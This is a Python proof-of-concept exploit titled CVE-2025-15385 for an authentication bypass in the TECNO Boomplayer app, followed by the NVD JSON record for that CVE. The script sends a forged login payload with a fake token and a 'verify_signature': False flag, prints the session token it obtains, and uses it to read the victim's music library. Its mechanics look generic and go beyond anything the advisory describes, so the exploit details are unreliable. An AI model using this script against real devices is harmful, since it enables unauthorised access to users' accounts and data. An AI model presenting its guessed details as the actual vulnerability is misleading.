CVE-2025-15385

# CVE-2025-15385 PoC - Boomplayer Authentication Bypass import requests import json TARGET_HOST = "http://target-tecno-device:8080" BOOMPLAYER_API = f"{TARGET_HOST}/api/v1/auth" def exploit_auth_bypass(): """ Exploit for CVE-2025-15385: Insufficient Verification of Data Authenticity in TECNO Boomplayer (com.Afmobi.Boomplayer) """ headers = { 'User-Agent': 'Boomplayer/7.4.63', 'Content-Type': 'application/json' } # Malicious payload to bypass authentication # Exploits insufficient verification of data authenticity payload = { 'username': '[email protected]', 'password': 'any_password', 'auth_token': 'FAKE_TOKEN_SIGNED_WITH_EXPIRED_KEY', 'verify_signature': False # Bypass signature verification } try: response = requests.post(BOOMPLAYER_API, json=payload, headers=headers, timeout=10) if response.status_code == 200: data = response.json() if 'session_token' in data: print(f"[+] Authentication Bypassed!") print(f"[+] Session Token: {data['session_token']}") print(f"[+] User ID: {data.get('user_id', 'Unknown')}") return data['session_token'] else: print(f"[-] Exploit Failed - Status: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Connection Error: {e}") return None def access_protected_resources(session_token): """Access protected resources after successful bypass""" headers = { 'Authorization': f'Bearer {session_token}', 'User-Agent': 'Boomplayer/7.4.63' } # Access user music library library_url = f"{TARGET_HOST}/api/v1/user/library" response = requests.get(library_url, headers=headers) print(f"[*] Library Access: {response.status_code}") return response.json() if response.status_code == 200 else None if __name__ == '__main__': print("[*] CVE-2025-15385 Exploit - TECNO Boomplayer Auth Bypass") token = exploit_auth_bypass() if token: access_protected_resources(token)

{"cve": {"id": "CVE-2025-15385", "sourceIdentifier": "907edf6c-bf03-423e-ab1a-8da27e1aa1ea", "published": "2026-01-06T02:15:41.387", "lastModified": "2026-01-30T01:13:07.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient Verification of Data Authenticity vulnerability in TECNO Mobile com.Afmobi.Boomplayer allows Authentication Bypass.This issue affects com.Afmobi.Boomplayer: 7.4.63."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "907edf6c-bf03-423e-ab1a-8da27e1aa1ea", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tecno:boomplay:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.4.63", "matchCriteriaId": "1B98150D-17A2-463A-AE33-82DB2152D8BE"}]}]}], "references": [{"url": "https://security.tecno.com/SRC/securityUpdates", "source": "907edf6c-bf03-423e-ab1a-8da27e1aa1ea", "tags": ["Vendor Advisory"]}]}}